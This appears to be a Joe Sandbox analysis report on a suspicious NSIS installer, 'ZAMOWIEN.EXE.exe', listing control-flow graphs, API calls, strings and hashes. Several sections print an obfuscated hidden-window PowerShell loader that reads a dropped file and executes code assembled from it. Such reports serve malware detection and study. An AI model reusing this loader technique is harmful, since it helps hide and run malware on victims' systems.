4169->4167 4170 40199d lstrlenA 4169->4170 4170->4167 4171->4169

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 4030ef-403186 #17 SetErrorMode OleInitialize call 405ea7 SHGetFileInfoA call 405b7c GetCommandLineA call 405b7c GetModuleHandleA 7 403192-4031a7 call 405654 CharNextA 0->7 8 403188-40318d 0->8 11 40326c-403270 7->11 8->7 12 403276 11->12 13 4031ac-4031af 11->13 14 403289-4032a3 GetTempPathA call 4030bb 12->14 15 4031b1-4031b5 13->15 16 4031b7-4031bf 13->16 25 4032a5-4032c3 GetWindowsDirectoryA lstrcatA call 4030bb 14->25 26 4032fb-403315 DeleteFileA call 402c33 14->26 15->15 15->16 17 4031c1-4031c2 16->17 18 4031c7-4031ca 16->18 17->18 20 4031d0-4031d4 18->20 21 40325c-403269 call 405654 18->21 23 4031d6-4031dc 20->23 24 4031ec-403219 20->24 21->11 40 40326b 21->40 28 4031e2 23->28 29 4031de-4031e0 23->29 30 40321b-403221 24->30 31 40322c-40325a 24->31 25->26 42 4032c5-4032f5 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030bb 25->42 43 4033a9-4033b8 ExitProcess CoUninitialize 26->43 44 40331b-403321 26->44 28->24 29->24 29->28 35 403223-403225 30->35 36 403227 30->36 31->21 38 403278-403284 call 405b7c 31->38 35->31 35->36 36->31 38->14 40->11 42->26 42->43 47 4034b2-4034b8 43->47 48 4033be-4033ce call 4053ad ExitProcess 43->48 45 403323-40332e call 405654 44->45 46 403399-4033a0 call 403627 44->46 63 403330-403359 45->63 64 403364-40336e 45->64 56 4033a5 46->56 54 403535-40353d 47->54 55 4034ba-4034d7 call 405ea7 * 3 47->55 58 403543-403547 ExitProcess 54->58 59 40353f 54->59 81 403521-40352c ExitWindowsEx 55->81 82 4034d9-4034db 55->82 56->43 59->58 66 40335b-40335d 63->66 67 403370-40337d call 405717 64->67 68 4033d4-4033ee lstrcatA lstrcmpiA 64->68 66->64 70 40335f-403362 66->70 67->43 79 40337f-403395 call 405b7c * 2 67->79 68->43 71 4033f0-403405 CreateDirectoryA SetCurrentDirectoryA 68->71 70->64 70->66 74 403412-40343a call 405b7c 71->74 75 403407-40340d call 405b7c 71->75 87 403440-40345c call 405b9e DeleteFileA 74->87 75->74 79->46 81->54 88 40352e-403530 call 40140b 81->88 82->81 85 4034dd-4034df 82->85 85->81 90 4034e1-4034f3 GetCurrentProcess 85->90 95 40349d-4034a4 87->95 96 40345e-40346e CopyFileA 87->96 88->54 90->81 100 4034f5-403517 90->100 95->87 99 4034a6-4034ad call 405a30 95->99 96->95 98 403470-403490 call 405a30 call 405b9e call 40534c 96->98 98->95 110 403492-403499 CloseHandle 98->110 99->43 100->81 110->95
                                                            APIs
                                                            • #17.COMCTL32 ref: 00403110
                                                            • SetErrorMode.KERNELBASE(00008001), ref: 0040311B
                                                            • OleInitialize.OLE32(00000000), ref: 00403122
                                                              • Part of subcall function 00405EA7: GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB9
                                                              • Part of subcall function 00405EA7: LoadLibraryA.KERNELBASE(?,?,?,00403134,00000008), ref: 00405EC4
                                                              • Part of subcall function 00405EA7: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED5
                                                            • SHGetFileInfoA.SHELL32(0079DCB8,00000000,?,00000160,00000000,00000008), ref: 0040314A
                                                              • Part of subcall function 00405B7C: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B89
                                                            • GetCommandLineA.KERNEL32(007A1F00,NSIS Error), ref: 0040315F
                                                            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\ZAMOWIEN.EXE.exe",00000000), ref: 00403172
                                                            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\ZAMOWIEN.EXE.exe",00000020), ref: 0040319D
                                                            • GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020), ref: 0040329A
                                                            • GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004032AB
                                                            • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004032B7
                                                            • GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004032CB
                                                            • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 004032D3
                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 004032E4
                                                            • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 004032EC
                                                            • DeleteFileA.KERNELBASE(1033), ref: 00403300
                                                            • ExitProcess.KERNEL32(?), ref: 004033A9
                                                            • CoUninitialize.COMBASE(?), ref: 004033AE
                                                            • ExitProcess.KERNEL32 ref: 004033CE
                                                            • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\ZAMOWIEN.EXE.exe",00000000,?), ref: 004033DA
                                                            • lstrcmpiA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033E6
                                                            • CreateDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004033F2
                                                            • SetCurrentDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\), ref: 004033F9
                                                            • DeleteFileA.KERNEL32(0079D8B8,0079D8B8,?,-windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)",?), ref: 00403452
                                                            • CopyFileA.KERNEL32(C:\Users\user\Desktop\ZAMOWIEN.EXE.exe,0079D8B8,00000001), ref: 00403466
                                                            • CloseHandle.KERNEL32(00000000,0079D8B8,0079D8B8,?,0079D8B8,00000000), ref: 00403493
                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 004034E8
                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403524
                                                            • ExitProcess.KERNEL32 ref: 00403547
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: ExitFileProcess$DirectoryHandlelstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                            • String ID: "$"C:\Users\user\Desktop\ZAMOWIEN.EXE.exe"$-windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings$C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings$C:\Users\user\Desktop$C:\Users\user\Desktop\ZAMOWIEN.EXE.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                            • API String ID: 2762237255-624694976
                                                            • Opcode ID: 0d15099f5609471c299781ab7be1be811c7768fcb7cb495e5ec6d057267a150f
                                                            • Instruction ID: cbe6203d26f901f65e01a216d62163169d989bdc7c49c29356e1850f369634ff
                                                            • Opcode Fuzzy Hash: 0d15099f5609471c299781ab7be1be811c7768fcb7cb495e5ec6d057267a150f
                                                            • Instruction Fuzzy Hash: 04B119709083516EE711AF745C4DA2B7EACEB86306F04457EF181B61E2C77C9A05CB6E

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 111 404fc7-404fe2 112 405173-40517a 111->112 113 404fe8-4050b1 GetDlgItem * 3 call 403ec1 call 404727 GetClientRect GetSystemMetrics SendMessageA * 2 111->113 115 4051a4-4051b1 112->115 116 40517c-40519e GetDlgItem CreateThread CloseHandle 112->116 134 4050b3-4050cd SendMessageA * 2 113->134 135 4050cf-4050d2 113->135 118 4051b3-4051b9 115->118 119 4051cf-4051d6 115->119 116->115 121 4051f1-4051fa call 403ef3 118->121 122 4051bb-4051ca ShowWindow * 2 call 403ec1 118->122 123 4051d8-4051de 119->123 124 40522d-405231 119->124 131 4051ff-405203 121->131 122->119 128 4051e0-4051ec call 403e65 123->128 129 405206-405216 ShowWindow 123->129 124->121 126 405233-405236 124->126 126->121 136 405238-40524b SendMessageA 126->136 128->121 132 405226-405228 call 403e65 129->132 133 405218-405221 call 404e89 129->133 132->124 133->132 134->135 140 4050e2-4050f9 call 403e8c 135->140 141 4050d4-4050e0 SendMessageA 135->141 142 405251-405272 CreatePopupMenu call 405b9e AppendMenuA 136->142 143 405345-405347 136->143 150 4050fb-40510f ShowWindow 140->150 151 40512f-405150 GetDlgItem SendMessageA 140->151 141->140 148 405274-405285 GetWindowRect 142->148 149 405287-40528d 142->149 143->131 153 405290-4052a8 TrackPopupMenu 148->153 149->153 154 405111-40511c ShowWindow 150->154 155 40511e 150->155 151->143 152 405156-40516e SendMessageA * 2 151->152 152->143 153->143 157 4052ae-4052c5 153->157 156 405124-40512a call 403ec1 154->156 155->156 156->151 158 4052ca-4052e5 SendMessageA 157->158 158->158 160 4052e7-405307 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 158->160 161 405309-405329 SendMessageA 160->161 161->161 162 40532b-40533f GlobalUnlock SetClipboardData CloseClipboard 161->162 162->143
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000403), ref: 00405026
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405035
                                                            • GetClientRect.USER32(?,?), ref: 00405072
                                                            • GetSystemMetrics.USER32(00000015), ref: 0040507A
                                                            • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 0040509B
                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050AC
                                                            • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050BF
                                                            • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050CD
                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 004050E0
                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405102
                                                            • ShowWindow.USER32(?,00000008), ref: 00405116
                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405137
                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405147
                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405160
                                                            • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040516C
                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405044
                                                              • Part of subcall function 00403EC1: SendMessageA.USER32(00000028,?,00000001,00403CF2), ref: 00403ECF
                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405189
                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00004F5B,00000000), ref: 00405197
                                                            • CloseHandle.KERNELBASE(00000000), ref: 0040519E
                                                            • ShowWindow.USER32(00000000), ref: 004051C2
                                                            • ShowWindow.USER32(00010438,00000008), ref: 004051C7
                                                            • ShowWindow.USER32(00000008), ref: 0040520E
                                                            • SendMessageA.USER32(00010438,00001004,00000000,00000000), ref: 00405240
                                                            • CreatePopupMenu.USER32 ref: 00405251
                                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405266
                                                            • GetWindowRect.USER32(00010438,?), ref: 00405279
                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040529D
                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052D8
                                                            • OpenClipboard.USER32(00000000), ref: 004052E8
                                                            • EmptyClipboard.USER32 ref: 004052EE
                                                            • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F7
                                                            • GlobalLock.KERNEL32(00000000), ref: 00405301
                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405315
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040532E
                                                            • SetClipboardData.USER32(00000001,00000000), ref: 00405339
                                                            • CloseClipboard.USER32 ref: 0040533F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                            • String ID: folketingssamlingerne Setup: Completed${
                                                            • API String ID: 590372296-3186977005
                                                            • Opcode ID: cd5787bd04a7943bbd89ca8f13c858e7cc0bb7f28d40d9c44bda858bf04774a3
                                                            • Instruction ID: e012edbc7131a32af6433ba0e52cc1c5aadcd187bdbee4d49277f23e00180f18
                                                            • Opcode Fuzzy Hash: cd5787bd04a7943bbd89ca8f13c858e7cc0bb7f28d40d9c44bda858bf04774a3
                                                            • Instruction Fuzzy Hash: EDA17D70900208FFEB119F60DD85AAE7FB9FB44355F00806AFA05BA1A1C7795E41DFA9

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 404 405b9e-405ba9 405 405bab-405bba 404->405 406 405bbc-405bd1 404->406 405->406 407 405dc4-405dc8 406->407 408 405bd7-405be2 406->408 410 405bf4-405bfe 407->410 411 405dce-405dd8 407->411 408->407 409 405be8-405bef 408->409 409->407 410->411 412 405c04-405c0b 410->412 413 405de3-405de4 411->413 414 405dda-405dde call 405b7c 411->414 415 405c11-405c46 412->415 416 405db7 412->416 414->413 418 405d61-405d64 415->418 419 405c4c-405c57 GetVersion 415->419 420 405dc1-405dc3 416->420 421 405db9-405dbf 416->421 424 405d94-405d97 418->424 425 405d66-405d69 418->425 422 405c71 419->422 423 405c59-405c5d 419->423 420->407 421->407 431 405c78-405c7f 422->431 423->422 428 405c5f-405c63 423->428 426 405da5-405db5 lstrlenA 424->426 427 405d99-405da0 call 405b9e 424->427 429 405d79-405d85 call 405b7c 425->429 430 405d6b-405d77 call 405ada 425->430 426->407 427->426 428->422 433 405c65-405c69 428->433 442 405d8a-405d90 429->442 430->442 435 405c81-405c83 431->435 436 405c84-405c86 431->436 433->422 438 405c6b-405c6f 433->438 435->436 440 405c88-405ca3 call 405a63 436->440 441 405cbf-405cc2 436->441 438->431 447 405ca8-405cab 440->447 445 405cd2-405cd5 441->445 446 405cc4-405cd0 GetSystemDirectoryA 441->446 442->426 444 405d92 442->444 448 405d59-405d5f call 405de7 444->448 450 405cd7-405ce5 GetWindowsDirectoryA 445->450 451 405d3f-405d41 445->451 449 405d43-405d46 446->449 452 405cb1-405cba call 405b9e 447->452 453 405d48-405d4c 447->453 448->426 449->448 449->453 450->451 451->449 454 405ce7-405cf1 451->454 452->449 453->448 457 405d4e-405d54 lstrcatA 453->457 459 405cf3-405cf6 454->459 460 405d0b-405d21 SHGetSpecialFolderLocation 454->460 457->448 459->460 462 405cf8-405cff 459->462 463 405d23-405d3a SHGetPathFromIDListA CoTaskMemFree 460->463 464 405d3c 460->464 465 405d07-405d09 462->465 463->449 463->464 464->451 465->449 465->460
                                                            APIs
                                                            • GetVersion.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00000000,00404EC1,C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00000000), ref: 00405C4F
                                                            • GetSystemDirectoryA.KERNEL32(007A16A0,00000400), ref: 00405CCA
                                                            • GetWindowsDirectoryA.KERNEL32(007A16A0,00000400), ref: 00405CDD
                                                            • SHGetSpecialFolderLocation.SHELL32(?,0078F530), ref: 00405D19
                                                            • SHGetPathFromIDListA.SHELL32(0078F530,007A16A0), ref: 00405D27
                                                            • CoTaskMemFree.OLE32(0078F530), ref: 00405D32
                                                            • lstrcatA.KERNEL32(007A16A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D54
                                                            • lstrlenA.KERNEL32(007A16A0,?,C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00000000,00404EC1,C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\,00000000), ref: 00405DA6
                                                            Strings
                                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D4E
                                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405C99
                                                            • -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)", xrefs: 00405D7E
                                                            • C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\, xrefs: 00405BCD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                            • String ID: -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"$C:\Users\user~1\AppData\Local\Temp\nss1F19.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                            • API String ID: 900638850-1827533660
                                                            • Opcode ID: 1c78712fc57c1b21ddcf7f114c16db5ad03e121287c6c7ae80bc93f1131741aa
                                                            • Instruction ID: cfbb71564de19aca3b2bc26046a3fc1a075fa9ae2907aa6082c2ad5de6d0bb48
                                                            • Opcode Fuzzy Hash: 1c78712fc57c1b21ddcf7f114c16db5ad03e121287c6c7ae80bc93f1131741aa
                                                            • Instruction Fuzzy Hash: FF61C131904A05ABEF119B68CC88BBF7BB4DF56314F14813BE501BA2D1C27C5982DF5A

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 466 405459-40547f call 405717 469 405481-405493 DeleteFileA 466->469 470 405498-40549f 466->470 471 405622-405626 469->471 472 4054a1-4054a3 470->472 473 4054b2-4054c2 call 405b7c 470->473 474 4055d0-4055d5 472->474 475 4054a9-4054ac 472->475 481 4054d1-4054d2 call 405670 473->481 482 4054c4-4054cf lstrcatA 473->482 474->471 477 4055d7-4055da 474->477 475->473 475->474 479 4055e4-4055ec call 405e80 477->479 480 4055dc-4055e2 477->480 479->471 490 4055ee-405602 call 405629 call 405411 479->490 480->471 484 4054d7-4054da 481->484 482->484 486 4054e5-4054eb lstrcatA 484->486 487 4054dc-4054e3 484->487 489 4054f0-40550e lstrlenA FindFirstFileA 486->489 487->486 487->489 491 405514-40552b call 405654 489->491 492 4055c6-4055ca 489->492 505 405604-405607 490->505 506 40561a-40561d call 404e89 490->506 499 405536-405539 491->499 500 40552d-405531 491->500 492->474 494 4055cc 492->494 494->474 503 40553b-405540 499->503 504 40554c-40555a call 405b7c 499->504 500->499 502 405533 500->502 502->499 508 405542-405544 503->508 509 4055a5-4055b7 FindNextFileA 503->509 517 405571-40557c call 405411 504->517 518 40555c-405564 504->518 505->480 511 405609-405618 call 404e89 call 405a30 505->511 506->471 508->504 514 405546-40554a 508->514 509->491 512 4055bd-4055c0 FindClose 509->512 511->471 512->492 514->504 514->509 526 40559d-4055a0 call 404e89 517->526 527 40557e-405581 517->527 518->509 519 405566-40556f call 405459 518->519 519->509 526->509 528 405583-405593 call 404e89 call 405a30 527->528 529 405595-40559b 527->529 528->509 529->509
                                                            APIs
                                                            • DeleteFileA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,771B3410,00000000), ref: 00405482
                                                            • lstrcatA.KERNEL32(0079FD00,\*.*,0079FD00,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3410,00000000), ref: 004054CA
                                                            • lstrcatA.KERNEL32(?,00409014,?,0079FD00,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3410,00000000), ref: 004054EB
                                                            • lstrlenA.KERNEL32(?,?,00409014,?,0079FD00,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3410,00000000), ref: 004054F1
                                                            • FindFirstFileA.KERNELBASE(0079FD00,?,?,?,00409014,?,0079FD00,?,?,C:\Users\user~1\AppData\Local\Temp\,771B3410,00000000), ref: 00405502
                                                            • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055AF
                                                            • FindClose.KERNELBASE(00000000), ref: 004055C0
                                                            Strings
                                                            • \*.*, xrefs: 004054C4
                                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405467
                                                            • "C:\Users\user\Desktop\ZAMOWIEN.EXE.exe", xrefs: 00405459
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                            • String ID: "C:\Users\user\Desktop\ZAMOWIEN.EXE.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                            • API String ID: 2035342205-2534336890
                                                            • Opcode ID: e2d485843bc1dc33020824ddff841a6807cf015e04534d4dc07c982e9136c584
                                                            • Instruction ID: c955c8b93a0d53af4c9a85723dcc71deb8f5af4d32c19fd1700f1dbf21e431d8
                                                            • Opcode Fuzzy Hash: e2d485843bc1dc33020824ddff841a6807cf015e04534d4dc07c982e9136c584
                                                            • Instruction Fuzzy Hash: 9F51AE70800A14BADF216B258C49BBF7A79EB42319F14817BF444B12D2D73C9A81DEAD
                                                            APIs
                                                            • FindFirstFileA.KERNELBASE(?,007A0548,C:\,0040575A,C:\,C:\,00000000,C:\,C:\,?,?,771B3410,00405479,?,C:\Users\user~1\AppData\Local\Temp\,771B3410), ref: 00405E8B
                                                            • FindClose.KERNEL32(00000000), ref: 00405E97
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
